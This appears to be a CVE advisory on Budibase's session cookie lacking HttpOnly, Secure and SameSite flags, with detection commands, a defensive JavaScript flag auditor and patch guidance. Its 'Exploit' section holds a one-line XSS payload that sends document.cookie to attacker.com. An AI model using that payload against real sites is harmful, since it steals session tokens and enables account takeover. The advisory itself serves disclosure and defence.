CVE-2026-42239 resides in the cookie‑setting logic for Budibase’s session JWT.
In `packages/backend-core/src/utils/utils.ts:218`, the `budibase:auth` cookie is
hardcoded with `httpOnly: false`, allowing JavaScript to read the token via
`document.cookie`. The cookie also lacks the `Secure` flag (so it is sent over
plaintext HTTP) and a `SameSite` attribute.
Attackers who already have an XSS vector, for example the stored XSS from
GHSA‑gp5x‑2v54‑v2q5 (unsanitized entity names), can inject a script that
exfiltrates the JWT to a remote server. Because `httpOnly` is `false`,
`document.cookie` returns the full session token, turning any XSS into a full
account takeover. With the stolen JWT, the attacker gains persistent access
to the victim’s account without needing to re‑exploit the XSS each time.
The patch, released in version 3.35.10, changes the cookie flags to
`httpOnly: true`, adds `Secure: true`, and sets `SameSite: 'lax'`.
Until upgraded, the missing `httpOnly` flag leaves the session token exposed
to any client‑side script execution.
DailyCVE Form:
Platform: Budibase
Version: <3.35.10
Vulnerability: Missing HttpOnly flag
Severity: High
Date: 2026-05-07
Prediction: Upgrade to 3.35.10
What Undercode Say:
# Check for a missing HttpOnly flag on the budibase:auth cookie. The cookie is only
# present on a response that sets it (e.g. the login response), so inspect that one:
curl -s -I https://target-budibase.com 2>/dev/null | grep -i "set-cookie: budibase:auth"
# Grep for the vulnerable cookie configuration in the source code:
grep -r "httpOnly: false" packages/backend-core/src/utils/utils.ts
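As an added example (not Budibase code or part of the original post), the check above can be automated: the script below parses the Set-Cookie headers of a response and reports which of the three protections named in this advisory (HttpOnly, Secure, SameSite) the `budibase:auth` cookie is missing. The two header sets are constructed samples of a pre-patch and a post-patch response; the JWT value is a placeholder.

```javascript
// Added example: audit the budibase:auth Set-Cookie header for the
// HttpOnly, Secure and SameSite attributes. Not Budibase project code.
// Input: the list of Set-Cookie header values from a response that sets
// the session cookie (constructed samples at the bottom).

const REQUIRED = ['httponly', 'secure', 'samesite'];

// Parse one Set-Cookie value into { name, value, attrs }, where attrs maps
// lower-cased attribute names to their string value (or true for flags).
function parseSetCookie(header) {
  const [pair, ...rest] = header.split(';').map((s) => s.trim());
  const eq = pair.indexOf('=');
  const name = eq === -1 ? pair : pair.slice(0, eq);
  const value = eq === -1 ? '' : pair.slice(eq + 1);
  const attrs = {};
  for (const part of rest) {
    if (!part) continue;
    const i = part.indexOf('=');
    const key = (i === -1 ? part : part.slice(0, i)).toLowerCase();
    attrs[key] = i === -1 ? true : part.slice(i + 1);
  }
  return { name, value, attrs };
}

// Return the list of missing protections for the session cookie, or null
// when the response does not set a cookie with that name at all.
function auditSessionCookie(setCookieHeaders, cookieName = 'budibase:auth') {
  const cookie = setCookieHeaders.map(parseSetCookie).find((c) => c.name === cookieName);
  if (!cookie) return null;
  const missing = REQUIRED.filter((a) => !(a in cookie.attrs));
  // SameSite=None is only honoured by browsers together with Secure; flag that too.
  const sameSite = cookie.attrs.samesite;
  if (typeof sameSite === 'string' && sameSite.toLowerCase() === 'none' && !('secure' in cookie.attrs)) {
    missing.push('samesite=none-without-secure');
  }
  return missing;
}

// Constructed sample headers: pre-patch (no flags) and post-patch (3.35.10 flags).
const VULNERABLE = ['budibase:auth=PLACEHOLDER.JWT.VALUE; Path=/; Expires=Wed, 01 Jan 2030 00:00:00 GMT'];
const PATCHED = ['budibase:auth=PLACEHOLDER.JWT.VALUE; Path=/; HttpOnly; Secure; SameSite=Lax'];

console.log('vulnerable, missing:', auditSessionCookie(VULNERABLE)); // [ 'httponly', 'secure', 'samesite' ]
console.log('patched, missing:', auditSessionCookie(PATCHED));       // []
```

To run it against a real instance, replace the sample arrays with the `set-cookie` header values captured from your own Budibase login response.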
Exploit:
// Attacker’s XSS payload – steal the JWT and send it to a remote server
new Image().src = 'https://attacker.com/steal?cookie=' + encodeURIComponent(document.cookie);
Protection:
Upgrade to Budibase version 3.35.10 or higher. If upgrading is not possible, manually override the cookie flags in the application configuration to enforce httpOnly: true, Secure: true, and SameSite: 'lax'.
Impact:
Full account takeover – any XSS vulnerability in the application leads to permanent compromise of the victim’s session.
Sources:
Reported By: nvd.nist.gov